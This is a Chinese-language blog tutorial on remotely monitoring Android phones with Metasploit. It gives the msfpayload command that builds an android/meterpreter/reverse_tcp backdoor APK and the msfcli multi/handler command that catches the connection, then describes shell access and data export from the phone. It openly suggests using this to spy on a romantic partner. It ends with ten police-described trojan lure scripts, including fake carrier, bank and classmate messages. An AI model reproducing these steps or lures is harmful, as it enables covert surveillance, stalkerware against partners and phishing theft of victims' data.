今天给大家说说关于android监控的话题
再说监听之前先科普一下什么是metasploit
Metasploit是在2004年8月,在拉斯维加斯如开了一次世界黑客交流会—黑帽简报(Black Hat Briefings)提出来的.是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,密码审计,Web应用程序扫描,社会工程。
Metasploit 的发布在安全界引发了强烈的“地震”。没有一款新工具能够一发布就能挤进此列表的15 强(也就是说,2000年和2003年的调查没有这种情况),更何况此工具在5强之列,超过很多广为流传的诞生了几十年的老牌工具。
PS:特别是那些有(男)女朋友,但是对自己对对方很不自信的时候,这个就很能让你安心了!!!哈哈(本人是用不着了,独身漂泊不解释)
用到的系统当然还是kali linux,这次是借助kali里面的metasploit这个很NX的工具。详情看下面
这次我就不介绍metasploit的使用方法了,下次吧,这里只是跟大家怎么输命令来完成对android的监听
1.首先生成木马文件
Msfconsole–启动metasploit这个工具
Postgresql是一个数据库,这个以后跟大家说吧
这里我就直接演示吧,大家看我的演示
msfpayload android/meterpreter/reverse_tcp LHOST=你的机器 LPORT=端口号 R > /root/sys2015.apk(木马后门名字及位置)去看一下生成的木马后门,
Msfcli multi/handler payload=android/meterpreter/reverse_tcp LHOST=你的机器 LPORT=端口号 E
(这里的”E”表示执行的意思)
这里我就不社工诱惑别人安装这个木马后门了哈。用自己的手机试一下,大家看看效果:
当我们安装好那个木马之后因为手机是联网的,kali这边马上就有反应了,大大家注意看kali这边的反应哈,如下图:
4.直接进入shell看看,我们可以看看手机的信息,是否root,什么有哪些进程等等,还可以到处他的数据之类的,简直是想干嘛就干嘛,如下图:
请无视屌丝我朋友不多且大部分是与10086的来往
查看下内容看看
本文,只是介绍如何远程控制安卓手机,如果你有办法将程序给对方运行,你可以直接生成手机木马,我们此篇只做入门方式介绍,让新手了解,什么是远程控制,如果远程控制安卓手机。
安卓手机有很多漏洞,比如,发一条彩信就可以让对方中病毒
安卓曝大漏洞:一条彩信可控制手机,影响95%设备
http://m.77169.net/HTML/205461.html
本站原创的,手机远程管理,木马远程管理等。
http://www.77169.org/hack/201507/205350.shtm
视频演示:http://v.qq.com/page/o/3/v/o0161dpiv3v.html
十种常见植入木马手段
一、冒充移动客服10086以积分兑换、感恩回馈、话费余额不足等方式种植木马
警方分析,此类案件中,犯罪分子通过技术手段伪装成移动客服10086向不特定多数人发送短信,以通知客户积分兑换、感恩回馈、话费打折等方式,诱惑收信人点击木马网址。诈骗短信中所提供的链接地址多为含有10086或l(字母L的小写)0086等字段的地址,令收信人误以为是官网链接而进行点击。
二、冒充银行客服以积分兑换、电子密码器失效等方式种植木马
警方分析,此类案件中,犯罪分子通过技术手段伪装成银行客服如:95588、95533等,向不特定多数人发送短信,以提醒客户积分兑换、电子密码器到期等方式,诱惑收信人点击木马网址。诈骗短信中所提供的链接地址大多系仿照银行官网地址申请,网址中含有ICBC、CCB等银行简称或者95588、95533等银行客服电话,令收信人误以为官网进行操作。例如:“建行喜讯通知:您使用我行账户积分已满10000分可兑换5%的现金,请登录手机网XXXXX兑换,逾期失效”。
三、冒充同学、好友、同事以聚会照片、整理的资料、帮忙查看合同等方式种植木马
警方分析,此类案件中,犯罪分子往往以熟人之间日常聊天的语气,称“整理了同学聚会的照片”、“发点东西留念”、“推荐个很不错的网站”或者“帮忙审看一下合同/资料”等方式,诱惑收信人点击木马网址。部分案件中,由于犯罪分子通过非法渠道获取了手机机主的信息,会在短信称呼机主的名字,从而增加欺骗性。
例如:“某某某,这是之前的聚会照弄好了,手机直接点击地址安装激活查看XXXXX”、“某某可能以后不会见面了,发些东西给你留念,点击XXXXX收取”。
四、以爆料、恐吓等方式种植木马
警方分析,此类案件中,犯罪分子往往以威胁恐吓的语气,声称“你老公/老婆有外遇了”、“瞧你做的好事”或者“你朋友的手机中木马了,有照片”等,诱惑收信人点击木马网址链接。例如:“某某某我是某某某,你们在外面搞的事都发在网上去了,你自己看看,网址XXXXX”。
五、冒充学校或教师以学生查看成绩、平时表现等方式种植木马
警方分析,此类案件中,犯罪分子冒充学校教师,以提供给学生家长查询孩子成绩、平时表现的网址的方式,诱惑收信人点击木马网址。个别案件还会利用特殊时间节点冒充高考、期末成绩查询网址进行诈骗。例如:“某某某家长,为了新学期提高孩子的成绩,请下载查看上学期各项表现XXXXX以促进学习”。
六、言语刺激收信人的方式种植木马
警方分析,此类案件中,犯罪分子在通过非法渠道获取手机机主的信息后,声称与机主的老公/老婆真心相爱,有照片为证,诱惑收信人点击木马网址。例如:“XXX,我是你老公女朋友,我爱上你老公了,我要和他结婚!这里有我和他的照片,不信你还是自己去看吧。地址XXXXX”。
七、利用彩信种植木马。
警方分析,此类案件中,犯罪分子往往发送一张图像较小或者比较有诱惑力的照片,手机持有人点击查看后会自动跳转至含有木马病毒的网址。
八、以购物返礼、降价促销等方式种植木马
警方分析,此类案件中,犯罪分子通过假冒京东、淘宝等商家进行购物返礼、积分兑换或者谎称自己有某某物品,因资金周转等原因降价甩卖等方式,诱惑收信人点击木马网址。例如:“【京东】亲,忘记领取了吗?最后一次通知,点击XXXXX即可领取价值198元手表一块,邮资自理”。
九、以代办大额信用卡的方式种植木马
警方分析,此类案件中,犯罪分子声称可以办理大额度信用卡,将木马链接伪装成信用卡申请协议等文件,诱骗收信人点击安装。
十、以通知交通违法的方式种植木马
警方分析,此类案件中,犯罪分子以提醒收信人交通违法并提供违法照片链接的方式,诱惑收信人点击木马网址。另外,犯罪分子往往还会利用通过不法渠道获取的公民个人信息(如手机号码关联的机主姓名、房产、机动车等)实施犯罪活动,令人防不胜防。
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
